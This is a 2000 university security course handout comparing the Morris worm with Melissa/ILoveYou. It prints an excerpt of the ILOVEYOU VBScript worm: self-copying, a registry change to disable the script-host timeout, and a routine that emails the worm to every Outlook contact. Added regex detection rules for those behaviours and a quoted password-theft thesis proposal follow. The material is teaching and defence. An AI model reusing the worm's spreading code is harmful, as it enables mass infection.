CS551: Security and Privacy on the Internet, Fall 2000
Manifest: Monday 30 October 2000
Assignments Due
- 8 November: Project Progress Reports
Work Right Now
With your nearby classmates, fill in as much as possible of the following table, highlighting the most important differences.
| | Morris Worm, 1988 | Melissa/ILoveYou, 1999 |
| --- | --- | --- |
| Vulnerabilities Exploited | | |
| Replication Strategy | | |
| Smart Things Author Did | | |
| Dumb Things Author Did | | |
| Damage Caused | | |
| Response | | |
| Outcome | | |
| Other Interesting Differences | | |
Readings
Read before 1 November:
Optional additional reading (you will need to read at least one of these for Problem Set 4):
- Gary McGraw and Greg Morrisett, Attacking Malicious Code: A Report to the Infosec Research Council, IEEE Software, September/October 2000. (PostScript)
Each of these papers describes recent work on systems that constrain the behavior of untrusted code. A question on Problem Set 4 will ask you to evaluate one of these systems in terms of the eight design principles in the Saltzer and Schroeder paper (pp. 7-8). It is recommended that you read the abstract for each of these online, then print out and read the entire paper for the one or more that seem most interesting.
- David Evans and Andrew Twyman, Flexible Policy-Directed Code Safety. IEEE Symposium on Security and Privacy, Oakland, California, May 9-12, 1999.
- Li Gong, M. Mueller, H. Prafullchandra, and R. Schemers. Going Beyond the Sandbox: An Overview of the New Security Architecture in the Java Development Kit 1.2. Proceedings of the USENIX Symposium on Internet Technologies and Systems, Monterey, California, December 1997.
- George Necula, Proof-Carrying Code. ACM Symposium on Principles of Programming Languages, 1997.
- Dan S. Wallach, Dirk Balfanz, Drew Dean and Edward W. Felten. Extensible Security Architectures for Java. ACM Symposium on Operating Systems Principles, October 1997.
$10B Program

```vbscript
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
...
sub main()
  On Error Resume Next
  dim wscr,rr
  set wscr=CreateObject("WScript.Shell")
  rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
  if (rr>=1) then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
  end if
  Set dirwin = fso.GetSpecialFolder(0)
  Set dirsystem = fso.GetSpecialFolder(1)
  Set dirtemp = fso.GetSpecialFolder(2)
  Set c = fso.GetFile(WScript.ScriptFullName)
  c.Copy(dirsystem&"\MSKernel32.vbs")
  c.Copy(dirwin&"\Win32DLL.vbs")
  c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
  regruns()
  html()
  spreadtoemail()
  listadriv()
end sub
...
sub spreadtoemail()
  On Error Resume Next
  dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
  set regedit=CreateObject("WScript.Shell")
  set out=WScript.CreateObject("Outlook.Application")
  set mapi=out.GetNameSpace("MAPI")
  for ctrlists=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrlists)
    x=1
    regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
    if (regv="") then
      regv=1
    end if
    if (int(a.AddressEntries.Count)>int(regv)) then
      for ctrentries=1 to a.AddressEntries.Count
        malead=a.AddressEntries(x)
        regad=""
        regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
        if (regad="") then
          set male=out.CreateItem(0)
          male.Recipients.Add(malead)
          male.Subject = "ILOVEYOU"
          male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
          male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
          male.Send
          regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
        end if
        x=x+1
      next
      regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
    else
      regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
    end if
  next
  Set out=Nothing
  Set mapi=Nothing
end sub
...
```

(328 total lines)
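One way a heuristic scanner could flag the behaviours visible in the excerpt above (self-copy, Windows Script Host timeout write, Outlook address-book walk, double-extension attachment). This is an added example, not part of the original handout; the rule names, verdict labels and sample scripts are assumptions made for illustration.

```python
import re

# Each rule lists patterns that must ALL appear; rule names are this example's own.
RULES = {
    "self_copy": [r'GetFile\(\s*WScript\.ScriptFullName\s*\)', r'\.Copy\s*\('],
    "wsh_timeout_write": [r'RegWrite\s+"[^"]*Windows Scripting Host\\Settings\\Timeout"'],
    "outlook_automation": [r'CreateObject\(\s*"Outlook\.Application"\s*\)'],
    "address_book_walk": [r'\.AddressLists\b', r'\.AddressEntries\b'],
    "mail_with_attachment": [r'\.Attachments\.Add\b', r'\.Send\b'],
    "double_extension": [r'\.(?:txt|jpg|doc|pdf)\.(?:vbs|vbe|js|wsf)\b'],
}
# Only the combination of these three behaviours is treated as mass-mailing.
MASS_MAILER = {"outlook_automation", "address_book_walk", "mail_with_attachment"}

def scan(script):
    # VBScript is case-insensitive, so the matching is too.
    return {name for name, pats in RULES.items()
            if all(re.search(p, script, re.IGNORECASE) for p in pats)}

def verdict(script):
    hits = scan(script)
    if MASS_MAILER <= hits:
        return "mass-mailer"
    return "review" if hits else "clean"

# Constructed samples: WORM_LINES are indicator lines quoted from the excerpt,
# not a working script; the other two are invented for contrast.
WORM_LINES = r'''
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
set out=WScript.CreateObject("Outlook.Application")
for ctrlists=1 to mapi.AddressLists.Count
malead=a.AddressEntries(x)
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
'''
SINGLE_REPORT_MAIL = r'''
Set app = CreateObject("Outlook.Application")
Set msg = app.CreateItem(0)
msg.Attachments.Add("C:\reports\weekly.pdf")
msg.Send
'''
DISK_CHECK = r'''
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Echo fso.GetDrive("C:").FreeSpace
'''
if __name__ == "__main__":
    for text in (WORM_LINES, SINGLE_REPORT_MAIL, DISK_CHECK):
        print(verdict(text), sorted(scan(text)))
```

The single-recipient report script trips two rules but not the address-book walk, which is why the verdict keys on the combination rather than on any one string.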
Links
Anti-Virus Companies
- James Gleick on the ILOVEYOU virus
- Onel de Guzman's rejected Thesis Proposal. Excerpt:
REASON FOR STUDY: The researcher decided to develop this program because the researcher believes that it will be helpful to a lot of people specially Internet users to get Windows passwords such as Internet Accounts to spend more time on Internet without paying.
IMPORTANCE OF THE STUDY:
The importance of the study is to help other people most especially Windows users. We all know that when we connect to the Internet we spend more time for surfing and reading email only, so when we are spending time we spend lots of money to pay the accounts for only using a couple of hours. So this program is the main solution, use it to steal and retrieve Internet accounts of the victim's computer.
POSSIBLE BENEFICIARIES:
The researcher will benefit all Windows Internet users from beginners to professional because this software is free to all. The main idea of this software is to cached and retrieved all lose passwords that users can enjoy it.
- Onel de Guzman's (non) Punishment, CBS, 21 August 2000.
- Melissa Plea Agreement
- Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988 - Another account of the Morris Worm incident; focuses on story of how the worm was analyzed and removed.
- Bulfinch's Account of the Trojan War
- Chenxi Wang, John Knight and Matthew Elder. On Computer Viral Infection and the Effect of Immunization, UVA-CS-99-32. A more realistic model for virus propagation.
- Quisquater, J. J., Guillou, L. C., Annick, M. and Berson, T. A. How to Explain Zero Knowledge Proofs to Your Children (or hapless Trick-or-Treaters), CRYPTO '89. (Attached to this manifest.)
Questions
"Normal people learn from their errors. Microsoft users apparently belong to another category."
Charles Bueche (quoted in 'ILOVEYOU' worm turns to States)
- What are viruses, worms and Trojan horses?
- What would happen if smart people wrote viruses today? (see Worst Nightmares Come Alive and I don't think I really love you (or writting internet worms for fun and profit) for a few ideas)
- What changes between 1988 and 2000 affect the propagation of and damage caused by malicious code?
- How can buffer overflows be exploited by malicious code? How can we make it harder?
- How do virus scanners work?
- Why are virus scanners more or less useless today?
- What is a zero-knowledge proof?
- How can Peggy convince Victor she knows something without revealing what it is?
University of Virginia Department of Computer Science CS 551: Security and Privacy on the Internet
David Evans evans@virginia.edu